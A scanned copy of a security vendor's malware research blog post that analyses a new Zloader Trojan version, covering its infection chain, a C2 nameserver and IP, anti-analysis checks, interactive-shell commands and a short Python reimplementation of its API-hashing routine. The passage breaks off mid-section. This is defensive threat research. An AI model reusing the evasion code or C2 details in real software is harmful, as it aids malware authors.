www.zscaler.com Open in urlscan Pro
2606:4700:4400::ac40:99eb  Public Scan

URL: https://www.zscaler.com/blogs/security-research/inside-zloader-s-latest-trick-dns-tunneling
Submission: On December 14 via api from IN — Scanned from DE

Form analysis 6 forms found in the DOM

<form class="mb-[3rem] pt-[4.8rem] md:mb-[4.2rem] md:pt-[3rem]">
  <div class="relative"><input placeholder="What are you looking for?" aria-label="job-search-input" class="
  border-0
  focus:ring-0
  w-full
  font-normal
  text-[2rem]
  leading-10
  -tracking-[0.01rem]
  py-[1.3rem]
  pr-[3rem]
  bg-[transparent]
  focus:outline-none
  md:text-[3.2rem]
  md:leading-[3.5rem]
  border-b-[0.3rem]
  autofill:shadow-[0 0 0px 1000px transparent inset]
  autofill:transition-[background-color]
  autofill:duration-[5000s]
  autofill:ease-in-out
   text-darkBlue border-b-pink autofill:text-darkBlue" value=""></div>
</form>

<form class="mb-[3rem] pt-[4.8rem] md:mb-[4.2rem] md:pt-[3rem]">
  <div class="relative"><input placeholder="What are you looking for?" aria-label="job-search-input" class="
  border-0
  focus:ring-0
  w-full
  font-normal
  text-[2rem]
  leading-10
  -tracking-[0.01rem]
  py-[1.3rem]
  pr-[3rem]
  bg-[transparent]
  focus:outline-none
  md:text-[3.2rem]
  md:leading-[3.5rem]
  border-b-[0.3rem]
  autofill:shadow-[0 0 0px 1000px transparent inset]
  autofill:transition-[background-color]
  autofill:duration-[5000s]
  autofill:ease-in-out
   text-darkBlue border-b-pink autofill:text-darkBlue" value=""></div>
</form>

<form class="marketoForm_root__Wkgni marketoForm_variant_cta_module__IwKzs mktoForm mktoHasWidth mktoLayoutLeft" id="mktoForm_7971"
  style="opacity: 100; font-family: Helvetica, Arial, sans-serif; font-size: 13px; color: rgb(51, 51, 51); width: 1601px;" novalidate="novalidate">
  <style type="text/css">
    .mktoForm .mktoButtonWrap.mktoRound .mktoButton {
      color: #fff;
      border: 1px solid #a3bee2;
      -webkit-border-radius: 5px;
      -moz-border-radius: 5px;
      border-radius: 5px;
      background-color: #779dd5;
      background-image: -webkit-gradient(linear, left top, left bottom, from(#779dd5), to(#5186cb));
      background-image: -webkit-linear-gradient(top, #779dd5, #5186cb);
      background-image: -moz-linear-gradient(top, #779dd5, #5186cb);
      background-image: linear-gradient(to bottom, #779dd5, #5186cb);
      padding: 0.4em 1em;
      font-size: 1em;
    }

    .mktoForm .mktoButtonWrap.mktoRound .mktoButton:hover {
      border: 1px solid #45638c;
    }

    .mktoForm .mktoButtonWrap.mktoRound .mktoButton:focus {
      outline: none;
      border: 1px solid #45638c;
    }

    .mktoForm .mktoButtonWrap.mktoRound .mktoButton:active {
      background-color: #5186cb;
      background-image: -webkit-gradient(linear, left top, left bottom, from(#5186cb), to(#779dd5));
      background-image: -webkit-linear-gradient(top, #5186cb, #779dd5);
      background-image: -moz-linear-gradient(top, #5186cb, #779dd5);
      background-image: linear-gradient(to bottom, #5186cb, #779dd5);
    }
  </style>
  <div class="mktoFormRow">
    <div class="mktoFieldDescriptor mktoFormCol" style="margin-bottom: 10px;">
      <div class="mktoOffset" style="width: 10px;"></div>
      <div class="mktoFieldWrap mktoRequiredField"><label for="Email_7971" id="LblEmail_7971" class="mktoLabel mktoHasWidth" style="width: 0px;">
          <div class="mktoAsterix">*</div>
        </label>
        <div class="mktoGutter mktoHasWidth" style="width: 10px;"></div><input id="Email_7971" name="Email" placeholder="Email Address" maxlength="255" aria-labelledby="LblEmail_7971 InstructEmail_7971" type="email"
          class="mktoField mktoEmailField mktoHasWidth mktoRequired" aria-required="true" style="width: 250px;" aria-label="Enter email"><span id="InstructEmail_7971" tabindex="-1" class="mktoInstruction"></span>
        <div class="mktoClear"></div>
      </div>
      <div class="mktoClear"></div>
    </div>
    <div class="mktoClear"></div>
  </div>
  <div class="mktoFormRow"><input type="hidden" name="subBlog" class="mktoField mktoFieldDescriptor mktoFormCol" value="" placeholder="" style="margin-bottom: 10px;">
    <div class="mktoClear"></div>
  </div>
  <div class="mktoFormRow"><input type="hidden" name="Single_OptIn_IP_Address__c" class="mktoField mktoFieldDescriptor mktoFormCol" value="" placeholder="" style="margin-bottom: 10px;">
    <div class="mktoClear"></div>
  </div>
  <div class="mktoFormRow"><input type="hidden" name="Campaign_Type__c" class="mktoField mktoFieldDescriptor mktoFormCol" value="" placeholder="" style="margin-bottom: 10px;">
    <div class="mktoClear"></div>
  </div>
  <div class="mktoFormRow"><input type="hidden" name="Campaign_Theme__c" class="mktoField mktoFieldDescriptor mktoFormCol" value="" placeholder="" style="margin-bottom: 10px;">
    <div class="mktoClear"></div>
  </div>
  <div class="mktoFormRow"><input type="hidden" name="newFirstName" class="mktoField mktoFieldDescriptor mktoFormCol" value="" placeholder="" style="margin-bottom: 10px;">
    <div class="mktoClear"></div>
  </div>
  <div class="mktoFormRow"><input type="hidden" name="Google_Click_Id__c" class="mktoField mktoFieldDescriptor mktoFormCol" value="" placeholder="" style="margin-bottom: 10px;">
    <div class="mktoClear"></div>
  </div>
  <div class="mktoFormRow"><input type="hidden" name="Campaign_Medium__c" class="mktoField mktoFieldDescriptor mktoFormCol" value="" placeholder="" style="margin-bottom: 10px;">
    <div class="mktoClear"></div>
  </div>
  <div class="mktoFormRow"><input type="hidden" name="Campaign_Source__c" class="mktoField mktoFieldDescriptor mktoFormCol" value="" placeholder="" style="margin-bottom: 10px;">
    <div class="mktoClear"></div>
  </div>
  <div class="mktoFormRow"><input type="hidden" name="Campaign_Name__c" class="mktoField mktoFieldDescriptor mktoFormCol" value="" placeholder="" style="margin-bottom: 10px;">
    <div class="mktoClear"></div>
  </div>
  <div class="mktoFormRow"><input type="hidden" name="cqaction" class="mktoField mktoFieldDescriptor mktoFormCol" value="" placeholder="" style="margin-bottom: 10px;">
    <div class="mktoClear"></div>
  </div>
  <div class="mktoFormRow"><input type="hidden" name="cqthreattype" class="mktoField mktoFieldDescriptor mktoFormCol" value="" placeholder="" style="margin-bottom: 10px;">
    <div class="mktoClear"></div>
  </div>
  <div class="mktoFormRow"><input type="hidden" name="cqemailverdict" class="mktoField mktoFieldDescriptor mktoFormCol" value="" placeholder="" style="margin-bottom: 10px;">
    <div class="mktoClear"></div>
  </div>
  <div class="mktoButtonRow"><span class="mktoButtonWrap mktoRound" style="margin-left: 120px;"><button type="submit" class="mktoButton">Subscribe</button></span></div><input type="hidden" name="formid" class="mktoField mktoFieldDescriptor"
    value="7971" placeholder=""><input type="hidden" name="munchkinId" class="mktoField mktoFieldDescriptor" value="306-ZEJ-256" placeholder=""><input type="hidden" name="LeadSource" class="mktoField mktoFieldDescriptor" value="Website Direct"
    placeholder=""><input type="hidden" name="Lead_Source_Type__c" class="mktoField mktoFieldDescriptor" value="Website" placeholder=""><input type="hidden" name="Lead_Source_Detail__c" class="mktoField mktoFieldDescriptor" value=""
    placeholder=""><input type="hidden" name="Lead_Source_Recent__c" class="mktoField mktoFieldDescriptor" value="" placeholder=""><input type="hidden" name="Campaign_Content__c" class="mktoField mktoFieldDescriptor" value="" placeholder=""><input
    type="hidden" name="Campaign_ID__c" class="mktoField mktoFieldDescriptor" value="" placeholder=""><input type="hidden" name="Campaign_Term__c" class="mktoField mktoFieldDescriptor" value="" placeholder="">
</form>

<form class="marketoForm_root__Wkgni marketoForm_variant_footer__jwLCq mktoForm mktoHasWidth mktoLayoutLeft" id="mktoForm_1944" style="opacity: 100; font-family: Helvetica, Arial, sans-serif; font-size: 13px; color: rgb(51, 51, 51); width: 1601px;"
  novalidate="novalidate">
  <style type="text/css">
    .mktoForm .mktoButtonWrap.mktoRound .mktoButton {
      color: #fff;
      border: 1px solid #a3bee2;
      -webkit-border-radius: 5px;
      -moz-border-radius: 5px;
      border-radius: 5px;
      background-color: #779dd5;
      background-image: -webkit-gradient(linear, left top, left bottom, from(#779dd5), to(#5186cb));
      background-image: -webkit-linear-gradient(top, #779dd5, #5186cb);
      background-image: -moz-linear-gradient(top, #779dd5, #5186cb);
      background-image: linear-gradient(to bottom, #779dd5, #5186cb);
      padding: 0.4em 1em;
      font-size: 1em;
    }

    .mktoForm .mktoButtonWrap.mktoRound .mktoButton:hover {
      border: 1px solid #45638c;
    }

    .mktoForm .mktoButtonWrap.mktoRound .mktoButton:focus {
      outline: none;
      border: 1px solid #45638c;
    }

    .mktoForm .mktoButtonWrap.mktoRound .mktoButton:active {
      background-color: #5186cb;
      background-image: -webkit-gradient(linear, left top, left bottom, from(#5186cb), to(#779dd5));
      background-image: -webkit-linear-gradient(top, #5186cb, #779dd5);
      background-image: -moz-linear-gradient(top, #5186cb, #779dd5);
      background-image: linear-gradient(to bottom, #5186cb, #779dd5);
    }
  </style>
  <div class="mktoFormRow">
    <div class="mktoFieldDescriptor mktoFormCol" style="margin-bottom: 10px;">
      <div class="mktoOffset" style="width: 10px;"></div>
      <div class="mktoFieldWrap mktoRequiredField"><label for="Email_1944" id="LblEmail_1944" class="mktoLabel mktoHasWidth" style="width: 0px;">
          <div class="mktoAsterix">*</div>
        </label>
        <div class="mktoGutter mktoHasWidth" style="width: 10px;"></div><input id="Email_1944" name="Email" placeholder="Please enter your email to subscribe" maxlength="255" aria-labelledby="LblEmail_1944 InstructEmail_1944" type="email"
          class="mktoField mktoEmailField mktoHasWidth mktoRequired" aria-required="true" style="width: 250px;" aria-label="Enter email"><span id="InstructEmail_1944" tabindex="-1" class="mktoInstruction"></span>
        <div class="mktoClear"></div>
      </div>
      <div class="mktoClear"></div>
    </div>
    <div class="mktoClear"></div>
  </div>
  <div class="mktoFormRow"><input type="hidden" name="subBlog" class="mktoField mktoFieldDescriptor mktoFormCol" value="" placeholder="" style="margin-bottom: 10px;">
    <div class="mktoClear"></div>
  </div>
  <div class="mktoFormRow"><input type="hidden" name="Single_OptIn_IP_Address__c" class="mktoField mktoFieldDescriptor mktoFormCol" value="" placeholder="" style="margin-bottom: 10px;">
    <div class="mktoClear"></div>
  </div>
  <div class="mktoFormRow"><input type="hidden" name="Campaign_Type__c" class="mktoField mktoFieldDescriptor mktoFormCol" value="" placeholder="" style="margin-bottom: 10px;">
    <div class="mktoClear"></div>
  </div>
  <div class="mktoFormRow"><input type="hidden" name="Campaign_Theme__c" class="mktoField mktoFieldDescriptor mktoFormCol" value="" placeholder="" style="margin-bottom: 10px;">
    <div class="mktoClear"></div>
  </div>
  <div class="mktoFormRow"><input type="hidden" name="newFirstName" class="mktoField mktoFieldDescriptor mktoFormCol" value="" placeholder="" style="margin-bottom: 10px;">
    <div class="mktoClear"></div>
  </div>
  <div class="mktoFormRow"><input type="hidden" name="Google_Click_Id__c" class="mktoField mktoFieldDescriptor mktoFormCol" value="" placeholder="" style="margin-bottom: 10px;">
    <div class="mktoClear"></div>
  </div>
  <div class="mktoFormRow"><input type="hidden" name="Campaign_Medium__c" class="mktoField mktoFieldDescriptor mktoFormCol" value="" placeholder="" style="margin-bottom: 10px;">
    <div class="mktoClear"></div>
  </div>
  <div class="mktoFormRow"><input type="hidden" name="Campaign_Source__c" class="mktoField mktoFieldDescriptor mktoFormCol" value="" placeholder="" style="margin-bottom: 10px;">
    <div class="mktoClear"></div>
  </div>
  <div class="mktoFormRow"><input type="hidden" name="Campaign_Name__c" class="mktoField mktoFieldDescriptor mktoFormCol" value="" placeholder="" style="margin-bottom: 10px;">
    <div class="mktoClear"></div>
  </div>
  <div class="mktoFormRow"><input type="hidden" name="cq_req_id" class="mktoField mktoFieldDescriptor mktoFormCol" value="b4581c576b1675fc1c029c9f38980a7f" placeholder="" style="margin-bottom: 10px;">
    <div class="mktoClear"></div>
  </div>
  <div class="mktoFormRow"><input type="hidden" name="cqaction" class="mktoField mktoFieldDescriptor mktoFormCol" value="" placeholder="" style="margin-bottom: 10px;">
    <div class="mktoClear"></div>
  </div>
  <div class="mktoFormRow"><input type="hidden" name="cqthreattype" class="mktoField mktoFieldDescriptor mktoFormCol" value="" placeholder="" style="margin-bottom: 10px;">
    <div class="mktoClear"></div>
  </div>
  <div class="mktoFormRow"><input type="hidden" name="cqemailverdict" class="mktoField mktoFieldDescriptor mktoFormCol" value="" placeholder="" style="margin-bottom: 10px;">
    <div class="mktoClear"></div>
  </div>
  <div class="mktoFormRow"><input type="hidden" name="cqphoneverdict" class="mktoField mktoFieldDescriptor mktoFormCol" value="" placeholder="" style="margin-bottom: 10px;">
    <div class="mktoClear"></div>
  </div>
  <div class="mktoButtonRow"><span class="mktoButtonWrap mktoRound" style="margin-left: 120px;"><button type="submit" class="mktoButton">Subscribe</button></span></div><input type="hidden" name="formid" class="mktoField mktoFieldDescriptor"
    value="1944" placeholder=""><input type="hidden" name="munchkinId" class="mktoField mktoFieldDescriptor" value="306-ZEJ-256" placeholder=""><input type="hidden" name="LeadSource" class="mktoField mktoFieldDescriptor" value="Website Direct"
    placeholder=""><input type="hidden" name="Lead_Source_Type__c" class="mktoField mktoFieldDescriptor" value="Website" placeholder=""><input type="hidden" name="Lead_Source_Detail__c" class="mktoField mktoFieldDescriptor" value=""
    placeholder=""><input type="hidden" name="Lead_Source_Recent__c" class="mktoField mktoFieldDescriptor" value="" placeholder=""><input type="hidden" name="Campaign_Content__c" class="mktoField mktoFieldDescriptor" value="" placeholder=""><input
    type="hidden" name="Campaign_ID__c" class="mktoField mktoFieldDescriptor" value="" placeholder=""><input type="hidden" name="Campaign_Term__c" class="mktoField mktoFieldDescriptor" value="" placeholder="">
</form>

<form class="marketoForm_root__Wkgni marketoForm_variant_footer__jwLCq mktoForm mktoHasWidth mktoLayoutLeft"
  style="opacity: 0; font-family: Helvetica, Arial, sans-serif; font-size: 13px; color: rgb(51, 51, 51); visibility: hidden; position: absolute; top: -500px; left: -1000px; width: 1600px;" novalidate="novalidate"></form>

<form class="marketoForm_root__Wkgni marketoForm_variant_cta_module__IwKzs mktoForm mktoHasWidth mktoLayoutLeft"
  style="opacity: 0; font-family: Helvetica, Arial, sans-serif; font-size: 13px; color: rgb(51, 51, 51); visibility: hidden; position: absolute; top: -500px; left: -1000px; width: 1600px;" novalidate="novalidate"></form>

Text Content

___

This site uses JavaScript to provide a number of functions, to use this site
please enable JavaScript in your browser.
OpenSearch

ThreatLabz

CXO REvolutionaries

Careers

Partners

Support

ShowContact Us

Get in touch

1-408-533-0288

Chat with us

ShowSign In

Zscaler Cloud Portal | Admin

Zscaler Cloud Portal One | Admin

Zscaler Cloud Portal Two | Admin

Zscaler Cloud Portal Three | Admin

Zscaler Cloud Portal Beta | Admin

admin.zscloud.net

Zscaler Private Access Cloud Portal One | Admin

Zscaler Private Access Cloud Portal Two | Admin


Home
Platform

Products

Solutions

Resources

Company

Request a demo
Secure the Workforce


Provide users with seamless, secure, reliable access to applications and data.

Secure the Cloud


Build and run secure cloud apps, enable zero trust cloud connectivity, and
protect workloads from data center to cloud.

Secure IoT/OT


Provide zero trust connectivity for IoT and OT devices and secure remote access
to OT systems.

Secure B2B


Provide zero trust site-to-site connectivity and reliable access to B2B apps for
partners.


Why Zscaler
Leadership in AI/ML
Zscaler SASE
Zscaler SSE
Analyst Recognition
Customer Stories
Partner Ecosystem
Reduce Your Carbon Footprint

GARTNER REPORT

Zscaler: A Leader in the 2024 Gartner® Magic Quadrant™ for Security Service Edge
(SSE)

Get the report


Cyberthreat Protection

Secure Internet Access (ZIA)
Secure Private Access (ZPA)
Zero Trust Firewall
Sandbox
Browser Isolation
Data Protection

Web and Email DLP
Multi-Mode CASB
Endpoint DLP
Unified SaaS Security
Gen AI Security
DSPM
BYOD Security
Zero Trust Networking

Zero Trust SD-WAN
Zero Trust Device Segmentation
Zero Trust Cloud
Zero Trust for IoT/OT
Digital Experience (ZDX)
Zero Trust SASE
Risk Management

Data Fabric for Security
Risk360
Unified Vulnerability Management
Deception
Breach Predictor
Identity Protection
External Attack Surface Management
Managed Threat Hunting

USE CASES

Zero Trust + AI
Business Insights
Replace VPN
Stop Ransomware
VDI Alternative
Secure Your Data
Optimize Digital Experiences
Deploy Zero Trust SASE
Deploy BYOD Securely
Reduce Cyber Risk
Accelerate M&A and Divestitures

INDUSTRY & MARKET SOLUTIONS

Healthcare
Banking & Financial Services
US Public Sector
US Federal Government
US State & Local Government
Education
Australia Government
China Government

PARTNERS

Explore Our Partners
Become a Partner
Partner Portal

TECHNOLOGY PARTNERS

Explore Technology Partners
Microsoft
CrowdStrike
AWS
Okta
Rubrik
SAP
USE CASES

Zero Trust + AI
Business Insights
Replace VPN
Stop Ransomware
VDI Alternative
Secure Your Data
Optimize Digital Experiences
Deploy Zero Trust SASE
Deploy BYOD Securely
Reduce Cyber Risk
Accelerate M&A and Divestitures
INDUSTRY & MARKET SOLUTIONS

Healthcare
Banking & Financial Services
US Public Sector
US Federal Government
US State & Local Government
Education
Australia Government
China Government
PARTNERS

Explore Our Partners
Become a Partner
Partner Portal
TECHNOLOGY PARTNERS

Explore Technology Partners
Microsoft
CrowdStrike
AWS
Okta
Rubrik
SAP

Resource Center

Resource Library
Blog
Customer Success Stories
Webinars
Zpedia

Events & Trainings

Upcoming Events
Zenith Live
Zscaler Academy

Security Research & Services

ThreatLabz Analytics
Security Advisory Updates
Zero Trust Resources


Tools

Security Preview
Security and Risk Assessment
Disclose a Vulnerability
Executive Insights App
Ransomware Protection ROI Calculator

Community & Support

Customer Success Center
Zenith Community
CXO REvolutionaries
Zscaler Help Portal

CXO REVOLUTIONARIES

Amplifying the voices of real-world digital and zero trust pioneers

Visit now


Resource Center

Resource Library
Blog
Customer Success Stories
Webinars
Zpedia
Events & Trainings

Upcoming Events
Zenith Live
Zscaler Academy
Security Research & Services

ThreatLabz Analytics
Security Advisory Updates
Zero Trust Resources

Tools

Security Preview
Security and Risk Assessment
Disclose a Vulnerability
Executive Insights App
Ransomware Protection ROI Calculator
Community & Support

Customer Success Center
Zenith Community
CXO REvolutionaries
Zscaler Help Portal
About Zscaler


Discover how it began and where it’s going

Partners


Meet our partners and explore system integrators and technology alliances

News & Announcements


Stay up to date with the latest news

Leadership Team


Meet our management team

Partner Integrations


Explore our technology partner integrations

Investor Relations


See news, stock information, and quarterly reports

Corporate Responsibility


Learn about our approach

Careers


Join our mission

Press Center


Find everything you need to cover Zscaler

Compliance


Understand our adherence to rigorous standards

Zenith Ventures


Learn about our strategic startup investments


Home
Request a demo


Platform

Products

Solutions

Resources

Company

Request a demo
ThreatLabzCXO REvolutionariesCareersPartnersSupport
ShowContact Us

Get in touch1-408-533-0288Chat with us
ShowSign In

Zscaler Cloud Portal | AdminZscaler Cloud Portal One | AdminZscaler Cloud Portal
Two | AdminZscaler Cloud Portal Three | AdminZscaler Cloud Portal Beta |
Adminadmin.zscloud.netZscaler Private Access Cloud Portal One | AdminZscaler
Private Access Cloud Portal Two | Admin

Platform


Secure the Workforce


Provide users with seamless, secure, reliable access to applications and data.

Secure the Cloud


Build and run secure cloud apps, enable zero trust cloud connectivity, and
protect workloads from data center to cloud.

Secure IoT/OT


Provide zero trust connectivity for IoT and OT devices and secure remote access
to OT systems.

Secure B2B


Provide zero trust site-to-site connectivity and reliable access to B2B apps for
partners.


Why Zscaler
Leadership in AI/ML
Zscaler SASE
Zscaler SSE
Analyst Recognition
Customer Stories
Partner Ecosystem
Reduce Your Carbon Footprint

GARTNER REPORT

Zscaler: A Leader in the 2024 Gartner® Magic Quadrant™ for Security Service Edge
(SSE)

Get the report


Products


Cyberthreat Protection

Secure Internet Access (ZIA)
Secure Private Access (ZPA)
Zero Trust Firewall
Sandbox
Browser Isolation
Data Protection

Web and Email DLP
Multi-Mode CASB
Endpoint DLP
Unified SaaS Security
Gen AI Security
DSPM
BYOD Security
Zero Trust Networking

Zero Trust SD-WAN
Zero Trust Device Segmentation
Zero Trust Cloud
Zero Trust for IoT/OT
Digital Experience (ZDX)
Zero Trust SASE
Risk Management

Data Fabric for Security
Risk360
Unified Vulnerability Management
Deception
Breach Predictor
Identity Protection
External Attack Surface Management
Managed Threat Hunting
Solutions



USE CASES

Zero Trust + AI
Business Insights
Replace VPN
Stop Ransomware
VDI Alternative
Secure Your Data
Optimize Digital Experiences
Deploy Zero Trust SASE
Deploy BYOD Securely
Reduce Cyber Risk
Accelerate M&A and Divestitures

INDUSTRY & MARKET SOLUTIONS

Healthcare
Banking & Financial Services
US Public Sector
US Federal Government
US State & Local Government
Education
Australia Government
China Government

PARTNERS

Explore Our Partners
Become a Partner
Partner Portal

TECHNOLOGY PARTNERS

Explore Technology Partners
Microsoft
CrowdStrike
AWS
Okta
Rubrik
SAP
USE CASES

Zero Trust + AI
Business Insights
Replace VPN
Stop Ransomware
VDI Alternative
Secure Your Data
Optimize Digital Experiences
Deploy Zero Trust SASE
Deploy BYOD Securely
Reduce Cyber Risk
Accelerate M&A and Divestitures
INDUSTRY & MARKET SOLUTIONS

Healthcare
Banking & Financial Services
US Public Sector
US Federal Government
US State & Local Government
Education
Australia Government
China Government
PARTNERS

Explore Our Partners
Become a Partner
Partner Portal
TECHNOLOGY PARTNERS

Explore Technology Partners
Microsoft
CrowdStrike
AWS
Okta
Rubrik
SAP
Resources



Resource Center

Resource Library
Blog
Customer Success Stories
Webinars
Zpedia

Events & Trainings

Upcoming Events
Zenith Live
Zscaler Academy

Security Research & Services

ThreatLabz Analytics
Security Advisory Updates
Zero Trust Resources


Tools

Security Preview
Security and Risk Assessment
Disclose a Vulnerability
Executive Insights App
Ransomware Protection ROI Calculator

Community & Support

Customer Success Center
Zenith Community
CXO REvolutionaries
Zscaler Help Portal

CXO REVOLUTIONARIES

Amplifying the voices of real-world digital and zero trust pioneers

Visit now


Resource Center

Resource Library
Blog
Customer Success Stories
Webinars
Zpedia
Events & Trainings

Upcoming Events
Zenith Live
Zscaler Academy
Security Research & Services

ThreatLabz Analytics
Security Advisory Updates
Zero Trust Resources

Tools

Security Preview
Security and Risk Assessment
Disclose a Vulnerability
Executive Insights App
Ransomware Protection ROI Calculator
Community & Support

Customer Success Center
Zenith Community
CXO REvolutionaries
Zscaler Help Portal
Company


About Zscaler


Discover how it began and where it’s going

Partners


Meet our partners and explore system integrators and technology alliances

News & Announcements


Stay up to date with the latest news

Leadership Team


Meet our management team

Partner Integrations


Explore our technology partner integrations

Investor Relations


See news, stock information, and quarterly reports

Corporate Responsibility


Learn about our approach

Careers


Join our mission

Press Center


Find everything you need to cover Zscaler

Compliance


Understand our adherence to rigorous standards

Zenith Ventures


Learn about our strategic startup investments

Zscaler Blog

Get the latest Zscaler blog updates in your inbox

Subscribe
Security Research


INSIDE ZLOADER’S LATEST TRICK: DNS TUNNELING

THREATLABZ
December 10, 2024 - 14 min read



Threatlabz Research


Contents

 1. Introduction
 2. Key Takeaways
 3. Infection Vector
 4. Technical Analysis
 5. Conclusion
 6. Zscaler Coverage
 7. Indicators Of Compromise (IOCs)
 8. More blogs

Copy URL
Copy URL



INTRODUCTION

Zloader (a.k.a. Terdot, DELoader, or Silent Night) is a modular Trojan based on
the leaked Zeus source code that emerged in 2015. The malware was originally
designed to facilitate banking fraud via Automated Clearing House (ACH) and wire
transfers. However, similar to other malware families like Qakbot and Trickbot,
Zloader has been repurposed for initial access, providing an entry point into
corporate environments for the deployment of ransomware. Zloader reemerged one
year ago following an almost two-year hiatus with a new iteration that included
modifications to its obfuscation techniques, domain generation algorithm (DGA),
anti-analysis techniques, and network communication.

ThreatLabz has identified a new version of Zloader (2.9.4.0) that has introduced
features that further enhance the malware’s anti-analysis capabilities, an
interactive shell for hands-on keyboard activity, and a Domain Name System (DNS)
tunnel for command-and-control (C2) communications. These modifications provide
additional layers of resilience against detection and mitigation. In this blog,
we’ll explore each of these new Zloader features, and examine the mechanics of
the new DNS tunneling protocol.




KEY TAKEAWAYS

 * Zloader (a.k.a. Terdot, DELoader, or Silent Night) is a modular Trojan based
   on the leaked Zeus source code dating back to 2015.
 * Zloader 2.9.4.0 adds notable improvements including a custom DNS tunnel
   protocol for C2 communications and an interactive shell that supports more
   than a dozen commands, which may be valuable for ransomware attacks.
 * Zloader’s anti-analysis techniques such as environment checks and API import
   resolution algorithms continue to be updated to evade malware sandboxes and
   static signatures.
 * Zloader attacks have been performed using more targeted methods that include
   luring victims into initiating Remote Monitoring and Management (RMM)
   sessions.




INFECTION VECTOR

The distribution of Zloader has become more small-scale and targeted, which has
become an increasingly popular trend among initial access brokers including
those that are affiliates of Black Basta ransomware. This trend has led to a
shift away from large-scale spam campaigns to more personalized voice-based
attacks over the past year. ThreatLabz has observed Zloader deployed through a
multi-stage infection chain starting through Remote Monitoring and Management
(RMM) tools including AnyDesk, TeamViewer, and Microsoft Quick Assist.
Furthermore, we have identified an additional malicious payload in the attack
chain, which is known as GhostSocks. We assess with medium to high confidence
that this payload was used to deploy Zloader as shown in the figure below:

Figure 1: Example Zloader attack chain observed by ThreatLabz.




TECHNICAL ANALYSIS

In this section, we will analyze the changes introduced in Zloader 2.9.4.0. 


CONFIGURATION

The Zloader static configuration is no longer encrypted with a hardcoded
plain-text RC4 key. Instead, the RC4 key is computed by performing an XOR
operation with two 16-byte character arrays. After decrypting Zloader’s
configuration, there are two new sections (highlighted below in red and blue) as
shown below:

Figure 2: Zloader decrypted static configuration.

These two sections are related to Zloader’s new DNS tunneling feature, which can
encapsulate encrypted network traffic through a custom protocol using DNS A and
AAAA records. The first new section in Zloader’s configuration contains an HTTPS
URL used as the TLS Server Name Indication (SNI) during the TLS handshake. In
this example, the value is fordns. This value is then followed by Zloader’s DNS
nameserver (e.g., ns1.brownswer.com), which serves as the C2 for communication.
The second new section in the Zloader configuration has three IP addresses (in
network byte order) for the DNS servers to use for the C2 nameserver’s
resolution in order of preference.

 * 2D 3D 98 9A →  45.61.152.154
 * 08 08 04 04 → 8.8.4.4
 * 08 08 08 08 → 8.8.8.8


ANTI-ANALYSIS


ENVIRONMENT CHECK

ThreatLabz identified Zloader version 2.9.4.0 samples labeled with the botnet
name Test. These samples are noteworthy because they do not perform the
anti-analysis registry-based environment check that we previously documented.
This environment check normally prevents Zloader from running on any  system
other than the one that it originally infected. 

However, in non-test Zloader 2.9.4.0 builds, a modified environment check is
still present. Instead of checking the value of a pseudo-randomly generated
registry key, Zloader utilizes an alternative method. The figure below
illustrates the process that Zloader uses to perform this anti-analysis
environment check.

Figure 3: Flow chart of Zloader’s environment check.

Similar to previous versions of Zloader, the malware first checks whether its
own executable name matches a hardcoded value that varies per sample. Zloader
then computes an MD5 hash of the machine-specific bot ID.

The bot ID is composed of the following values:

 * Computer name
 * User name
 * Install date in seconds since the epoch (1970-01-01 UTC)

An example of a bot ID is: COMPANY1_JohnDoe_5BFEA21D

Zloader then retrieves a value within the executable’s .rdata section, which
will be NULL if the Zloader executable has not been used to infect a system. If
the Zloader executable has been used to infect a system, this value will be
filled in by Zloader as part of the infection process. If the MD5 hash of the
bot ID matches the expected value after installation, Zloader will continue
execution. However, if this field is not NULL and does not match the expected
hash value of the bot ID, Zloader will terminate. This environment check serves
as an indication to the malware that the Zloader executable has been transferred
to another environment (e.g., a malware sandbox or an analyst system).

During the installation phase, Zloader version 2.9.4.0 creates a copy of the
original executable with a modified MZ header at offset 0x24, which is reserved
for the OEM identifier and OEM information. The value at this offset serves as a
pointer to the .rdata location where the MD5 hash value address is located. An
example of the modified Zloader MZ header field at offset 0x24 is shown in the
figure below:

Figure 4: Example Zloader MZ header modification prior to initializing the
expected bot ID hash parameter in the .rdata section.

Once the address in the .rdata section has been located, Zloader writes the
expected MD5 hash of the bot ID to this region and zeros the modified bytes in
the MZ header at offset 0x24. Zloader then launches this modified executable
with the initialized bot ID field, and deletes the original executable.

API RESOLUTION

The import API resolution for Zloader was also updated in the latest version.
The API resolution continues to use the cyclic redundancy check (CRC) algorithm,
but the result is now calculated by performing an XOR operation with a constant,
and function names are now converted to lowercase instead of uppercase letters.
The following Python code replicates Zloader’s API resolution:

def calculate_checksum(func_name, xor_constant):
   checksum = xor_constant
   for element in func_name.lower():
       checksum = 16 * checksum - (0 - (ord(element)+1))
       if checksum & 0xf0000000 != 0:
           checksum = ((((checksum & 0xf0000000) >> 24) ^ checksum) & 0xfffffff)
   return checksum ^ xor_constant

Zloader also now dynamically calculates the index of the DLL name to resolve
functions from in each case. Before, the code only had a single DWORD value with
the checksum to resolve, and the index of the DLL was hardcoded. Now, Zloader
uses two DWORDs per function to determine the DLL and function name. The figure
below shows an example of several API functions and the corresponding DWORD
values used for the resolution.

Figure 5: Example Zloader values used to resolve API import names.

An XOR operation with a constant value (that changes per sample) is performed
with the second DWORD. Another XOR operation is performed with the result and
the first DWORD. The code that replicates this algorithm is shown below:

dll_hash_index = dword_2 ^ 0xC3C0D88F; // the XOR constant varies per sample
hash_xor_crc = dll_hash_index ^ dword_1;



INTERACTIVE SHELL

Another new feature introduced in Zloader 2.9.4.0 was an interactive shell that
provides the threat actor with the ability to execute arbitrary binaries and
shellcode, exfiltrate data, terminate processes, etc. The table below shows the
commands that are currently implemented in Zloader. 

Command

Description

exec

Execute binary.

cmd

Native command line.

getfile

Get file from server rshell/files.

sendfile

Send file to the server rshell/uploads.

getsc

Get shellcode from server rshell/files.

runsc

Run shellcode with the specified architecture.

 

getdll

Get DLL from the server rshell/files.

rundll

Run DLL from memory.

find_process

Find process by name.

status_process

Get process status by PID.

kill

Kill process.

cd

Display/change current directory.

dir

Show contents of a directory.

bot_id

Show bot ID.

exit

Quit shell.

Table 1: Zloader 2.9.4.0 interactive shell commands.

These commands are likely used by threat actors when performing hands-on
keyboard activity related to reconnaissance and ransomware deployment.


NETWORK COMMUNICATION


HTTPS

Zloader continues to use HTTPS with POST requests as the primary C2
communication channel. However, the Zloader HTTP headers have changed. For
example, the User-Agent field is now set to PresidentPutin. In addition, Zloader
adds a Rand HTTP header value set to pseudo random alphabetic characters between
32 and 255 characters in length. Since the request is sent via TLS, the Rand
field varies the packet size to prevent potential size-based network detections.
